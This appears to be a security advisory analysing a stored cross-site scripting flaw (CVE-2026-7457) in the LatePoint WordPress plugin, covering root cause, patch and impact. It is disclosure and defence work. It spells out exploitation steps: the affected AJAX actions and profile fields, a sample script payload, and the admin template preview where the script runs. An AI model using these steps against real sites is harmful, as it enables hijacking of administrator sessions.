CVE-2026-7457: LatePoint <= 5.5.0 – Authenticated (Subscriber+) Stored Cross-Site Scripting via Customer Cabinet Profile Update (latepoint)

CVE ID CVE-2026-7457
Plugin latepoint
Severity Medium (CVSS 6.4)
CWE 79
Vulnerable Version 5.5.0
Patched Version 5.5.1
Disclosed May 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-7457: This is a Stored Cross-Site Scripting (XSS) vulnerability in the LatePoint WordPress plugin, versions up to 5.5.0. Authenticated subscribers can inject arbitrary JavaScript into customer profile fields, which later executes in the admin notification preview panel when an administrator or agent views templates referencing those fields.

The root cause lies in two combined flaws. First, the customer profile update endpoint lacks input sanitization. In OsCustomerModel (models/customer_model.php), the prepare_data_before_it_is_set() method did not sanitize first_name, last_name, or notes. Although sanitize_text_field() existed for phone, the other fields bypassed sanitization because OsCustomerModel did not override params_to_sanitize(), causing set_data() to store unsanitized values verbatim (lines 374-382 of the patched diff). Second, the notification template preview function generate_preview() in lib/misc/process_action.php uses str_replace() to inject these stored values into HTML without calling esc_html(). The patched diff shows multiple instances where esc_html() and wp_kses_post() were added to sanitize output (lines 603-626).

To exploit, an authenticated attacker (subscriber role) first registers as a customer via the LatePoint customer cabinet. The attacker then submits a POST request to update their profile fields – first_name, last_name, phone, or notes – with a payload such as alert(1). The endpoint is accessible via AJAX actions like latepoint_save_customer or through the customer cabinet form at /customer/profile/. The plugin stores this unsanitized value in the wp_latepoint_customers table. When an administrator previews a notification template that uses {{customer_full_name}}, {{customer_first_name}}, {{customer_last_name}}, {{customer_phone}}, or {{customer_notes}}, the payload renders without escaping, executing the script in the admin’s browser.

The patch in version 5.5.1 adds sanitization at the model level. In prepare_data_before_it_is_set(), the code now calls sanitize_text_field() on first_name and last_name, sanitize_textarea_field() on notes, and retains sanitize_phone_number() for phone. This ensures data is sanitized before storage. The output escaping was already insufficient, but the input-side fix prevents stored XSS at the source. Additionally, the patch includes a permission check in save_connected_wordpress_user() to prevent unauthenticated overwrites of WordPress user data (lines 1147-1181), addressing a related authorization issue but not the XSS vector itself.

A successful exploit allows an authenticated attacker to inject arbitrary JavaScript that executes in the context of an administrator’s or agent’s browser. The impact is stored XSS (CWE-79) with medium severity (CVSS 6.4). An attacker could steal session cookies, perform actions on behalf of admins (e.g., create new admin users, modify plugin settings, exfiltrate sensitive data from the dashboard), or redirect users to malicious sites. The attack requires only subscriber-level access, which is easy to obtain in WordPress as registration is often open.
